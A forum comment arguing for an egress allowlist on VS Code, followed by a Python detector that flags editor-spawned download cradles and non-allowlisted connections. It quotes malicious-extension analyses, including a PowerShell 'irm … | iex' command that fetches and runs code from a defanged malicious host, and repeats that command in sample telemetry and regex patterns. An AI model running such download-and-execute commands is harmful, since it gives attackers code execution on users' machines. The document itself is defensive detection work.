by gus_
23 days ago
restrict code.exe to an allowlist. Also, many malicious actors rely on system commands to download or exfiltrate data. Take for example this activity from a malicious extension:

"This code makes an HTTP GET request to https://solidity[.]bot/version.json that includes the system’s platform string in the headers.

    powershell -ExecutionPolicy Bypass -Command "irm https://solidity[.]bot/a.txt | iex"

This PowerShell command downloads and executes https://solidity[.]bot/a.txt, a suspicious action that, when coupled with the use of obfuscation in extension.js, indicates malicious intent."

https://securitylabs.datadoghq.com/articles/mut-9332-malicio...

Or this one:

    const CONFIG_URL = 'http://clawdbot.getintwopc[.]site/config.json';
    function fetchConfigAndRun() {
    http.get(CONFIG_URL, (res)

They also establish outbound connections to Dropbox and other unexpected domains: https://www.aikido.dev/blog/fake-clawdbot-vscode-extension-m...

So maybe it's not bulletproof, but it helps to mitigate these threats.
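As an added example (not part of gus_'s comment or of the Datadog/Aikido articles it links), the following Python turns the two controls the comment argues for into detection logic over endpoint telemetry: an egress allowlist for code.exe, and flagging shells spawned by the editor whose command line carries a download-and-execute cradle like the `irm ... | iex` one quoted above. The log format, field names, the allowlist contents and the sample events are all constructed assumptions; the destination hosts are the defanged ones printed in the comment, plus www.dropbox.com as a stand-in for the "Dropbox" mention.

```python
"""Added example, not code from the comment or the linked articles.
Applies an egress allowlist for code.exe and a child-shell cradle check to
constructed key=value telemetry. Field names, allowlist and sample lines are
assumptions made for the example."""
import re
from dataclasses import dataclass

# Assumed allowlist of hosts the editor legitimately needs (hypothetical set;
# a real deployment derives this from its own marketplace/update traffic).
CODE_EGRESS_ALLOWLIST = {
    "marketplace.visualstudio.com",
    "update.code.visualstudio.com",
    "github.com",
}

# Shells that a VS Code extension host should rarely need to spawn.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash.exe"}

# Download cradle shapes: "<fetch> ... | <eval>" and the ExecutionPolicy bypass
# flag, both present in the command quoted in the comment.
CRADLE_PATTERNS = [
    re.compile(
        r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|curl|wget)\b.*\|\s*(iex|invoke-expression)\b",
        re.I,
    ),
    re.compile(r"-executionpolicy\s+bypass", re.I),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def defang(host: str) -> str:
    """Normalise defanged hosts (solidity[.]bot -> solidity.bot) so the
    allowlist comparison is done on the real name form."""
    return host.replace("[.]", ".").lower()


def parse_event(line: str) -> dict:
    """Parse key=value telemetry; quoted values may contain spaces and pipes."""
    fields = {}
    for m in re.finditer(r'(\w+)=("([^"]*)"|(\S+))', line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def analyze(lines):
    """Return one Finding per event that violates either control."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        kind = ev.get("type")
        if kind == "process" and ev.get("parent", "").lower() == "code.exe":
            image = ev.get("image", "").lower()
            cmd = ev.get("cmdline", "")
            if image in SHELLS and any(p.search(cmd) for p in CRADLE_PATTERNS):
                findings.append(Finding("editor_spawned_download_cradle", cmd))
        elif kind == "network" and ev.get("image", "").lower() == "code.exe":
            host = defang(ev.get("dest", ""))
            if host not in CODE_EGRESS_ALLOWLIST:
                findings.append(Finding("editor_egress_not_allowlisted", host))
    return findings


# Constructed sample telemetry (not real logs); hosts are the defanged ones
# from the comment plus www.dropbox.com as a stand-in for "Dropbox".
SAMPLE_TELEMETRY = [
    "type=network image=Code.exe dest=marketplace.visualstudio.com port=443",
    "type=network image=Code.exe dest=solidity[.]bot port=443",
    'type=process parent=Code.exe image=powershell.exe cmdline="powershell -ExecutionPolicy Bypass -Command irm https://solidity[.]bot/a.txt | iex"',
    "type=network image=Code.exe dest=clawdbot.getintwopc[.]site port=80",
    'type=process parent=Code.exe image=git.exe cmdline="git status"',
    "type=network image=Code.exe dest=www.dropbox.com port=443",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_TELEMETRY):
        print(f"{f.rule}: {f.detail}")
```

The allowlist check fires on every host the comment names, and the cradle check fires on the quoted PowerShell line while leaving the ordinary `git status` child alone; an editor launching a shell is normal, so the rule keys on the command-line shape rather than on the spawn itself, which is what keeps the false-positive rate workable.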